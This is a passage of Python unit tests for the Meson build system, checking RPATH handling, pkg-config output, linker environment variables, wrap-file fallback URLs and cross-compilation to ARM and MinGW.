'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
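        # In the build tree the rpath must contain the uninstalled library dir
        # ($ORIGIN resolves relative to the binary itself) plus the build_rpath
        # entry; after installation only the install_rpath should remain.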
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '77 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
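        # Formats flagged True are spellings Meson is expected to reject; the
        # loop below asserts that configuration fails for those.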
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
break
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
            self.assertNotIn(b'libpkgdep-int', pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
            self.assertNotIn(b'glib', pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
        '''
        Build and install a static library that ships a generated pkg-config
        file, then check that a separate project can consume it purely through
        PKG_CONFIG_PATH pointing at the installed .pc directory.
        '''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
        self.assertLess(deps.index(b'-lsomething'), deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
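        # Ninja's '|' introduces implicit dependencies, so the generated
        # sources must depend on the overriding executable being built first.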
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
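        # otool -L lists the install names the program was linked against; the
        # installed binary should not reference the library via @rpath.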
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
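        # Count the flag's occurrences per line of build.ninja; correct
        # de-duplication means it never appears more than once on any line.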
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
                # Assert that the library appears exactly once on this line.
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
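        # build_wrapper.py and host_wrapper.py are expected to wrap the same
        # native compiler, so the "cross" compiler is effectively the native
        # one (hence "identity cross").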
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
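        # e.g. for C this resolves to the CC_LD environment variable.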
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
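        # The primary URLs point at an unreachable host on purpose so that the
        # file:// fallback URLs are what actually gets exercised.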
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
        self.fail('Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '76 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
        self.fail('Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
